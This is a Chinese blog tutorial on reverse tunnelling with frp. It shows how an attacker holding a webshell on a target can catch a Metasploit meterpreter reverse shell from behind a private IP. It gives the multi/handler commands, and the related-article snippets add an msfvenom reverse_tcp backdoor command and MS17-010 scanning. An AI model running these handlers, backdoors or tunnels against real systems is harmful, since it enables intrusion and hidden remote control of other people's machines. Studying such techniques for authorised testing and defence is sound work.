反向代理(隧道)

最新推荐文章于 2024-06-21 18:12:08 发布
最新推荐文章于 2024-06-21 18:12:08 发布
阅读量191 收藏
点赞数
分类专栏: 网络安全 文章标签: 代理模式 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52963334/article/details/133869964
版权

反向代理

场景描述

image-20231016205710539

如图所示,当攻击者获得了目标主机的一个webshell,需要反弹shell时,由于是公网ip而攻击者是内网ip,所以反弹shell会失败,这时就可以通过反向代理(隧道)来实现

使用工具

frpc(客户端),frps(服务器端)

具体流程

监听本地4444端口

1、启动msf :msfconsole

2、载入监控模块 :use exploit/multi/handler

3、加载payload:

set payload windows/meterpreter/reverse_tcp

set lport 4444

set lhost 127.0.0.1

run

服务器端

frps.exe -c frps.ini

image-20231016211127119

frps.ini文件

image-20231016211238413

客户端frpc

sudo ./frpc -c frpc.ini

image-20231016211720537

frpc.ini

image-20231016212001278

ps:如果一直连接失败,可以尝试重启服务器

hutudamn
关注
专栏目录
SSH反向代理转发至内网msf
weixin_30835649的博客
08-03 728
前言 买了个便宜的 vps , 在上面装 msf 也装不上,于是想着把端口映射到内网来。 正文 拓扑如下: 首先在内网主机 B ssh -fCNR 7281:localhost:5000 root@C_IP 执行完后会把 B:5000 反弹到 C_IP:7281.此时 C 监听 127.0.0.1:7281 然后然后在 公网中转服务器 C ssh -fCNL *:5586:localhost:...
内网渗透(一)反向代理实现外网访问到内网
m0_63699746的博客
08-02 1278
msfvenom -p windows/meterpreter/reverser_tcp LHOST=你的云服务器ip LPORT=3333(端口自定) -f exe > msf.exe ,生成的后门放到a虚拟机中。总结:首先攻击端(服务器)攻击具有内网和外网的虚拟机,取得权限,然后进行对另一台在同一内网的虚拟机进行渗透,通过开启隧道(也就是建立节点),让宿主机连接作为跳板的攻击机,来实现访问另一台内网上的虚拟机。攻击机(服务器)使用msf生成后门,放到a虚拟机中,点开与运行上线。
内网安全:代理技术详解
最新发布
baimao__Ch的博客
06-21 761
背景:拿下内网的一个主机权限并且上线到MSF/CS上,IP:192.168.x.*使用控制192.168.x.*的Meterpreter启动路由,MSF相当于进入到该网段中开启节点,支持代理来的转发流量攻击机A(外网,军火库)配置代理到MSF上CS代理建立:有手就行在192.168.x.*的会话上开启SOCKS代理在攻击机A上配置代理装置建立通讯的最大意义就是:可以实现攻击机与内网主机的通讯,有了通讯才能横向移动要根据防火墙因地制宜的选择方式。
建立ssh反向隧道
lu_linux的博客
04-17 383
一台有公网IP的服务器A一台内网的设备B一台客户端设备C。
域渗透(二)-内网隧道与端口转发技术
黑白的博客
05-01 6344
对于我们的环境而言,kali是桥接,首先只能访问桥接的win2016和centos7-2,所以我们跟kali通信的大多是使用win2016的,这里毕竟是模拟环境,我们就会假设win2016这台windows已经被拿下了,所以很多木马都是直接放到win2016上的,这些操作跟域相关的知识关系还不是很大,基本都是拿下第一台服务器后的一些操作,所以用到kali和win2016比较多,我们的环境是建立在vmware的三种网络模式上,去模拟各种环境。
渗透测试之内网渗透(三):流量转发
m0_74131821的博客
04-25 1583
在拿到一台服务器的shell的时候,如果想要更进一步渗透测试,则需要进行内网渗透
反向代理搭建隧道
njmanong的博客
02-18 638
首先以服务器系统为Ubuntu18.04为例 由于SSH在一段时间没有数据包之后会断开,所以最好直接使用autossh来配置反向代理。 (以下操作均在内网进行,而且我采用的是在root账户进行操作) 首先是安装autossh:我在服务器上重装的是Ubuntu18.04,可用以下命令进行安装 apt-get install autossh 然后添加我们的内网机器的ssh-key到公网以实现自动登陆:ssh-copy-id <公网机器A的登陆用户名>@<公网机器的ip地址>。
反向代理
m0_51597317的博客
05-12 334
含义:指真实的服务器不能直接被外部网络访问,想要访问必须通过代理反向代理的配置: 1、在物理机C:\Windows\System32\drivers\etc里的hosts文件进行域名与IP的对应关系 添加一行:192.168.60.8 www.abc123.com 保存 2、在代理机上配置tomcat站点 安装命令传输: [root@hh ~]# yum -y install lrzsz 用命令传输资源包:rz “apache-tomcat-8.5.43.tar.gz和jd...
C#2.0中的简单反向代理(描述和部署)
04-11
在C#2.0中创建一个简单的反向代理是一个实用的技术,它允许通过服务器转发请求到其他服务器,以便隐藏原始源或平衡负载。这个过程在Web开发中特别有用,因为它可以提供灵活性,安全性和性能优化。本文将深入探讨...
使用autossh+阿里云做反向代理笔记,无需任何第三方软件
08-05
在IT行业中,内网穿透和反向代理是两个重要的网络技术概念,特别是在远程访问和分布式系统中。本文将深入探讨如何使用autossh和阿里云服务实现这一目标,无需额外的第三方软件。 首先,让我们理解一下核心组件:...
PortFusion:TCP 的分布式反向/正向代理和隧道解决方案。-开源
07-01
PortFusion 是一个简约的、跨平台的、传输层分布式反向/转发 TCP 代理,用 Haskell + LLVM 编写并在 GPLv3 下发布。 一个单一的包,通过利用每个平台的独特功能来充分利用每个平台,将这种功能与直观的界面、漂亮的...
通过ssh反向隧道及nginx反向代理实现外网控制内网nodemcu芯片
fg607的博客
08-04 4598
基本思路:通过ssh反向隧道实现外网服务器端口到内网中继服务器端口的转发,通过配置内网中级服务器nginx反向代理,将外网发过来的请求转发到目标服务器上。最后实现通过访问外网ip转到访问内网的目标服务器。 (一)ssh反向隧道将外网服务器端口转发到内网中继服务器指定端口 (1)首先需要指定外网中继服务器 sshd 的 GatewayPorts(转发外部主机的端口) 打开中继服务器的
搭建内网靶场并用MSF进行内网穿透/渗透实验
Cwillchris的博客
10-17 4058
实验名称:利用MSF打穿内网 实验人:XX 实验日期:2021.10.16 实验目的:利用MSF进行内网渗透 实验拓扑: 实验环境: 所用机器 网络类型 IP 默认网关 DNS 攻击机:kali NAT 172.16.12.30/24 172.16.12.2 114.114.114.114
模拟实战从外网打点渗透到内网域控的笔记
qq_56426046的博客
12-11 1394
在docker如果启动的时候 --privileged=true 是 可以逃逸的。这次模拟实战的项目几乎是第一次做这么完整的项目从外网渗透到内网域控,这次渗透过程中学到了很多东西,但很多也是我应该熟练使用的。然后通过任意文件写入getshell,因为重装信息会写到config.php,也就 给了我写马的机会.工具地址:https://github.com/Ridter/noPac。设置 kali 的 /etc/proxychains4.conf 文件。利用任意文件删除漏洞删除install.lock文件。
使用msf进行反弹shell+内网渗透
热门推荐
JSMaster01的博客
12-30 1万+
首先说明一点,反弹shell的前提是该主机能够执行我们的恶意命令 反弹shell的原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。 一、反弹shell: 1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令如下:“msfveno...
后渗透阶段之基于MSF的路由转发
谢公子的博客
06-17 5841
目录 反弹MSF类型的Shell 添加内网路由 MSF的跳板功能是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的Meterpreter Shell的基础上添加一条去往“内网”的路由,直接使用MSF去访问原本不能直接访问的内网资源,只要路由可达了那么我们就可以使用MSF来进行探测了。 我们现在有下面这个环境: Web服务器通过端口映射,对外提供Web服务。Web服...
Metasploit小技巧
weixin_30443813的博客
08-07 301
meterpreter >进入meterpreter之后即可进行一些相关木马操作了,下面是正式本章内容首先可以查看帮助文档,命令“help”,挑常用操作来讲↓↓↓------------------------------------------------------------------------------------------------用户操作:Stdapi: User i...
MSF利用ms17-010漏洞过程记录
weixin_30249203的博客
07-24 565
1.使用网上以上一个监测工具,扫描出存在ms17-010的主机地址 2.在kali中使用MSF进行检测,存在mf17-010漏洞 msf > use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.31.91 RHOSTS =&...
你这种方式,只是做了反向代理,我要做mysql的所有请求的stream代理
06-14
对不起,我理解错了你的需求。如果你要使用 Nginx 进行 MySQL 的 stream 代理,你可以使用 Nginx 的 Stream Core Module。下面是一个简单的配置示例: ...为了保证安全,建议使用 SSL 或 SSH 隧道来加密 MySQL 流量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值